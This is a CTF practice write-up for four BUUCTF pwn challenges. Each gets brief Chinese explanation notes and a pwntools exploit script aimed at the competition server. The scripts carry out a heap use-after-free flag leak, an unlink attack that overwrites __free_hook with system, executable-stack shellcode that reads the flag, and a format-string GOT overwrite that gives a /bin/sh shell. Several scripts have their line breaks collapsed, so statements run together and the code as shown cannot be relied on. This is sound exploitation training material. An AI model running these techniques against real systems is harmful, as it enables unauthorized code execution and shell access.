PWN-PRACTICE-BUUCTF-23

- gyctf_2020_some_thing_exceting
- axb_2019_heap
- [极客大挑战 2019]Not Bad
- inndy_echo

gyctf_2020_some_thing_exceting

程序读取了flag到bss段上的0x6020A8地址处
存在uaf漏洞，利用fastbins的LIFO原则，create大小合适的chunk并free
再次create，将0x6020A8覆写到之前create并free掉的chunk里，最后show即可打印出flag

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./gyctf_2020_some_thing_exceting")
io=remote("node4.buuoj.cn",29559)
elf=ELF("./gyctf_2020_some_thing_exceting")
libc=ELF("./libc-2.23.so")
flag_addr=0x6020A8def add(ba_len,ba,na_len,na):io.sendlineafter("> Now please tell me what you want to do :","1")io.sendlineafter("> ba's length : ",str(ba_len))io.sendlineafter("> ba : ",ba)io.sendlineafter("> na's length : ",str(na_len))io.sendlineafter("> na : ",na)
def edit():io.sendlineafter("> Now please tell me what you want to do :","2")
def free(index):io.sendlineafter("> Now please tell me what you want to do :","3")io.sendlineafter("> Banana ID : ",str(index))
def show(index):io.sendlineafter("> Now please tell me what you want to do :","4")io.sendlineafter("> SCP project ID : ",str(index))
def exit():io.sendlineafter("> Now please tell me what you want to do :","5")#gdb.attach(io)
#pause()add(0x10,"aaaa",0x20,"bbbb")#0
add(0x20,"cccc",0x20,"dddd")#1#pause()free(1)#pause()free(0)#pause()add(0x10,"eeee",0x10,p64(flag_addr)*2)#2#pause()show(1)exit()io.interactive()

axb_2019_heap

elf，保护全开，不能通过got改写地址，也不知道程序的基地址
利用格式化字符串漏洞泄露libc基址和main基址
输入content的get_input函数存在obo漏洞，可构成unlink
参考：buuctf axb_2019_heap

# -*- coding:utf-8 -*-
from pwn import *
#io=process("./axb_2019_heap")
io=remote("node4.buuoj.cn",27073)
elf=ELF("./axb_2019_heap")
libc=ELF("./libc-2.23-16-x64.so")def add(index,size,content):io.sendlineafter("Enter a option: \n>> ","1")io.sendlineafter("Enter the index you want to create (0-10):",str(index))io.sendlineafter("Enter a size:\n",str(size))io.sendlineafter("Enter the content: \n",content)
def free(index):io.sendlineafter("Enter a option: \n>> ","2")io.sendlineafter("Enter an index:\n",str(index))
def show():io.sendlineafter("Enter a option: \n>> ","3")
def edit(index,content):io.sendlineafter("Enter a option: \n>> ","4")io.sendlineafter("Enter an index:\n",str(index))io.sendlineafter("Enter the content: \n",content)io.recvuntil("Enter your name: ")
payload="%15$p%19$p"
io.sendline(payload)
io.recvuntil("0x")
libc_base=int(io.recvuntil("0x")[:-2],16)-240-libc.sym["__libc_start_main"]
main_base=int(io.recvuntil("\n")[:-1],16)-0x000000000000116A
print("libc_base=="+hex(libc_base))
print("main_base=="+hex(main_base))
free_hook=libc_base+libc.sym["__free_hook"]
system=libc_base+libc.sym["system"]
note=main_base+0x202060#gdb.attach(io)
#pause()add(0,0x98,"a"*0x98)#0
add(1,0x90,"bbbb")#1
add(2,0x90,"/bin/sh\x00")#2#pause()payload=p64(0)+p64(0x91)+p64(note-0x18)+p64(note-0x10)
payload=payload.ljust(0x90,"a")
payload+=p64(0x90)+p8(0xa0)
edit(0,payload)#pause()free(1)#pause()payload=p64(0)*3+p64(free_hook)+p64(0x08)
edit(0,payload)#pause()edit(0,p64(system))#pause()free(2)io.interactive()

[极客大挑战 2019]Not Bad

NX disabled，堆栈可执行
程序调用mmap函数在地址0x123000处开辟了一块0x1000大小的堆块
sub_400A16函数中可造成栈溢出，在栈上布局shellcode，调整栈顶指针rsp，使之能够指向shellcode
读取当前目录下的flag文件到0x123000+0x100处，调用write打印出flag
打开的flag文件的文件描述符按0，1，2的顺序加1，即为3

# -*- coding:utf-8 -*-
from pwn import *
context.arch="amd64"
context.os="linux"
#io=process("./bad")
io=remote("node4.buuoj.cn",27593)
elf=ELF("./bad")
mmap_addr=0x123000
jmp_rsp=0x400A01
io.recvuntil("Easy shellcode, have fun!\n")
payload=asm(shellcraft.read(0,mmap_addr,0x100))+asm("mov rax,0x123000;call rax")
payload=payload.ljust(32+8,"\x00")
payload+=p64(jmp_rsp)+asm("sub rsp,0x30;jmp rsp")
io.sendline(payload)
payload=shellcraft.open("./flag")
payload+=shellcraft.read(3,mmap_addr+0x100,0x50)
payload+=shellcraft.write(1,mmap_addr+0x100,0x50)
payload=asm(payload)
io.sendline(payload)
io.interactive()

inndy_echo

格式化字符串漏洞，输入的偏移为7
通过printf_got泄露出printf的真实地址，进而得到libc基地址，计算system真实地址
通过printf_got修改printf真实地址为system的真实地址
输入"/bin/sh\x00"，即可执行system("/bin/sh\x00")

from pwn import *
context.log_level='debug'
#io=process('./inndy_echo')
io=remote("node4.buuoj.cn",28404)
elf=ELF('./inndy_echo')
printf_got=elf.got["printf"]
payload=p32(printf_got)+"%7$s"
io.sendline(payload)
printf_addr=u32(io.recvuntil('\xf7')[-4:])
print("printf_addr=="+hex(printf_addr))
libc=ELF('./libc-2.23-x32.so')
libc_base=printf_addr-libc.sym["printf"]
system_addr=libc_base+libc.sym['system']
print("system_addr=="+hex(system_addr))
payload=fmtstr_payload(7,{printf_got:system_addr})
io.sendline(payload)
io.sendline('/bin/sh\x00')
io.interactive()